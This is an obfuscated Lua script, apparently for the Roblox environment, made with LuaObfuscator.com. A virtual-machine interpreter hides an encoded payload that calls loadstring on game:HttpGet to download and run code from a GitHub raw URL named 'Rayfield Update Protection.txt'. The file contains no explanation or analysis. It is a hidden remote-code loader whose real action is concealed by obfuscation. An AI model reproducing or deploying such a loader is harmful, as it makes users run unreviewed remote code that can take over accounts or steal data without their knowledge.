--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v90=0;while true do if (v90==0) then v19=v0(v3(v30,1,1));return "";end end else local v91=v2(v0(v30,16));if v19 then local v113=v5(v91,v19);v19=nil;return v113;else return v91;end end end);local function v20(v31,v32,v33) if v33 then local v92=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v92-(v92%(569 -(367 + 201))) ;else local v93=2^(v32-(928 -(214 + 713))) ;return (((v31%(v93 + v93))>=v93) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=0 + (117 -(32 + 85)) ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=(4 + 0) -3 ;end end end local function v22() local v36=180 -(67 + 113) ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (1213 -(892 + 65))) + v37 ;end if (v36==((0 + 0) -0)) then v37,v38=v1(v16,v18,v18 + (3 -(2 -1)) );v18=v18 + (3 -1) ;v36=351 -(87 + 263) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;return (v42 * ((30434979 -13656811) -(802 + 150))) + (v41 * ((128432 + 48012) -110908)) + (v40 * 256) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=998 -(915 + 82) ;local v46=(v20(v44,439 -(145 + 293) ,20) * ((5 -3)^(19 + 13))) + v43 ;local v47=v20(v44,(457 -(44 + 386)) -6 ,31);local v48=((v20(v44,1219 -(1069 + (1604 -(998 + 488))) )==1) and  -(2 -1)) or ((1 + 0) -0) ;if (v47==(0 + 0)) then if (v46==(0 -0)) then return v48 * (0 + 0 + 0) ;else v47=1;v45=791 -(368 + 423) ;end elseif (v47==(6433 -4386)) then return ((v46==(18 -(10 + 8))) and (v48 * ((3 -2)/(442 -(416 + 26))))) or (v48 * NaN) ;end return v8(v48,v47-(3266 -2243) ) * (v45 + (v46/((1 + 1)^(91 -39)))) ;end local function v25(v49) local v50;if  not v49 then local v94=772 -(201 + 571) ;while true do if (v94==(1138 -(116 + 1022))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v67=3 -2 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0 + 0 ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v112=(function() return 0;end)();while true do if (v112~=(718 -(15 + 703))) then else if (v104==(1 + 0)) then while true do if (v95==0) then v96=(function() return v97();end)();if (v98(v96, #"{", #"\\")~=(438 -(262 + 176))) then else local v155=(function() return 0;end)();local v156=(function() return;end)();local v157=(function() return;end)();local v158=(function() return;end)();while true do if (v155==0) then local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171==(1721 -(345 + 1376))) then v172=(function() return 0 + 0 ;end)();while true do if (v172~=(689 -(198 + 490))) then else v155=(function() return 1;end)();break;end if (v172~=(0 -0)) then else local v183=(function() return 0 -0 ;end)();while true do if (v183~=(867 -(550 + 317))) then else v156=(function() return v98(v96,2, #"asd");end)();v157=(function() return v98(v96, #"0836",8 -2 );end)();v183=(function() return 2 -1 ;end)();end if (v183~=(1207 -(696 + 510))) then else v172=(function() return 1;end)();break;end end end end break;end end end if (3~=v155) then else if (v98(v157, #"asd", #"asd")== #">") then v158[ #"0313"]=(function() return v101[v158[ #".dev"]];end)();end v102[v103]=(function() return v158;end)();break;end if (v155~=(1 -0)) then else v158=(function() return {v99(),v99(),nil,nil};end)();if (v156==(1262 -(1091 + 171))) then local v177=(function() return 0 + 0 ;end)();while true do if (v177==(285 -(134 + 151))) then v158[ #"91("]=(function() return v99();end)();v158[ #".com"]=(function() return v99();end)();break;end end elseif (v156== #"[") then v158[ #"91("]=(function() return v100();end)();elseif (v156==(1667 -(970 + 695))) then v158[ #"xxx"]=(function() return v100() -((3 -1)^16) ;end)();elseif (v156== #"-19") then local v185=(function() return 1990 -(582 + 1408) ;end)();while true do if (0==v185) then v158[ #"xnx"]=(function() return v100() -(2^(50 -34)) ;end)();v158[ #"asd1"]=(function() return v99();end)();break;end end end v155=(function() return 6 -4 ;end)();end if (v155~=(376 -(123 + 251))) then else if (v98(v157, #"!", #",")== #"~") then v158[6 -4 ]=(function() return v101[v158[9 -7 ]];end)();end if (v98(v157,2,2 -0 )~= #"}") then else v158[ #"asd"]=(function() return v101[v158[ #"gha"]];end)();end v155=(function() return 701 -(208 + 490) ;end)();end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end if (v104~=(0 -0)) then else local v120=(function() return 0 + 0 ;end)();while true do if ((0 + 0)~=v120) then else v95=(function() return 0;end)();v96=(function() return nil;end)();v120=(function() return 837 -(660 + 176) ;end)();end if (v120==(242 -(187 + 54))) then v104=(function() return 1 + 0 ;end)();break;end end end break;end end end end;end)();local v53=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();while true do if ((202 -(14 + 188))~=v108) then else local v118=(function() return 675 -(534 + 141) ;end)();while true do if (v118==(0 + 0)) then v105[v106-#"[" ]=(function() return v107();end)();return v105,v106,v107;end end end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"<",v58 do local v70=(function() return 0 + 0 ;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70~=(0 + 0)) then else v71=(function() return 0 -0 ;end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end if (v70~=(1 -0)) then else v73=(function() return nil;end)();while true do if (v71~=(0 -0)) then else v72=(function() return v21();end)();v73=(function() return nil;end)();v71=(function() return 1 -0 ;end)();end if (v71==(1 -0)) then if (v72== #">") then v73=(function() return v21()~=(0 + 0) ;end)();elseif (v72==(1638 -(1373 + 263))) then v73=(function() return v24();end)();elseif (v72== #"-19") then v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end end break;end end end v57[ #"19("]=(function() return v21();end)();for v74= #"{",v23() do FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v59,v54,v74=(function() return v52(FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v59,v54,v74);end)();end for v75= #"}",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1001 -(451 + 549) ];local v65=v61[2];local v66=v61[3];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1 + 0 ;local v81= -((1258 -(1043 + 214)) -(0 -0));local v82={};local v83={...};local v84=v12("#",...) -((2597 -(323 + 889)) -(746 + 638)) ;local v85={};local v86={};for v109=0 + 0 ,v84 do if ((1432<3555) and (v109>=v78)) then v82[v109-v78 ]=v83[v109 + (1 -0) ];else v86[v109]=v83[v109 + (342 -(218 + 123)) ];end end local v87=(v84-v78) + (1582 -(1535 + (123 -77))) ;local v88;local v89;while true do v88=v76[v80];v89=v88[1 + 0 ];if (v89<=(1 + 5)) then if ((v89<=2) or (1065>3578)) then if (v89<=(560 -(306 + 254))) then local v122=0 + 0 ;local v123;while true do if (v122==(0 -0)) then v123=v88[2];v86[v123]=v86[v123](v13(v86,v123 + (1468 -(899 + 568)) ,v81));break;end end elseif (v89>(1 + 0)) then local v124=0;local v125;local v126;local v127;local v128;while true do if ((4 -2)==v124) then for v167=v125,v81 do local v168=603 -(268 + 335) ;while true do if (v168==((870 -(361 + 219)) -(60 + 230))) then v128=v128 + (573 -(426 + 146)) ;v86[v167]=v126[v128];break;end end end break;end if (v124==(0 + (320 -(53 + 267)))) then v125=v88[1458 -(282 + 1174) ];v126,v127=v79(v86[v125](v13(v86,v125 + (812 -(569 + 242)) ,v88[8 -5 ])));v124=1 + 0 ;end if ((v124==(1025 -(706 + 318))) or (4795<1407)) then v81=(v127 + v125) -(1252 -(721 + 530)) ;v128=1271 -(945 + 326) ;v124=4 -2 ;end end else v86[v88[1 + 1 + 0 ]]();end elseif (v89<=(704 -(271 + 429))) then if ((1853<4813) and (v89==((416 -(15 + 398)) + (982 -(18 + 964))))) then v86[v88[1502 -(1408 + 92) ]]=v88[1089 -((1735 -1274) + 625) ];else v86[v88[(747 + 543) -(993 + 295) ]]=v88[1 + 2 + 0 ];end elseif (v89>5) then do return;end else local v133=(2021 -(20 + 830)) -(418 + 588 + 165) ;local v134;local v135;while true do if (v133==(1 + 0)) then v86[v134 + 1 + 0 ]=v135;v86[v134]=v135[v88[(128 -(116 + 10)) + 2 ]];break;end if (0==v133) then v134=v88[1 + 1 ];v135=v86[v88[532 -(406 + 123) ]];v133=1770 -(1749 + 20) ;end end end elseif (v89<=(3 + 6)) then if ((v89<=(1329 -(1249 + 73))) or (2821<2431)) then do return;end elseif (v89==(3 + 5)) then local v136=v88[1147 -(466 + 679) ];local v137=v86[v88[6 -3 ]];v86[v136 + (2 -1) ]=v137;v86[v136]=v137[v88[1904 -(8 + 98 + 1794) ]];else local v141=0 + (738 -(542 + 196)) ;local v142;while true do if (v141==(0 + 0)) then v142=v88[5 -(6 -3) ];v86[v142]=v86[v142](v13(v86,v142 + 1 + 0 ,v81));break;end end end elseif ((v89<=(29 -18)) or (2874<2181)) then if (v89==((64 + 60) -(2 + 2 + 110))) then v86[v88[586 -(57 + 527) ]]();else v86[v88[1429 -(41 + 1386) ]]=v63[v88[106 -(17 + 86) ]];end elseif (v89>(9 + 3)) then local v145=v88[3 -1 ];local v146,v147=v79(v86[v145](v13(v86,v145 + (2 -(2 -1)) ,v88[169 -(122 + 44) ])));v81=(v147 + v145) -(1 -0) ;local v148=0 -(0 -0) ;for v153=v145,v81 do local v154=0 + 0 ;while true do if (v154==(0 + 0)) then v148=v148 + (1 -0) ;v86[v153]=v146[v148];break;end end end else v86[v88[67 -(30 + 35) ]]=v63[v88[(1554 -(1126 + 425)) + 0 ]];end v80=v80 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574037F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F61726B616E7A756C6661646C6970757472612D6F2Q732F456E7469746965732D4D6F64656C732F726566732F68656164732F6D61696E2F4875622F5261796669656C6425323055707461646525323050726F74656374696F6E2E74787400083Q00120C3Q00013Q00120C000100023Q002008000100010003001203000300044Q0002000100034Q00095Q00022Q000A3Q000100012Q00063Q00017Q00",v9(),...);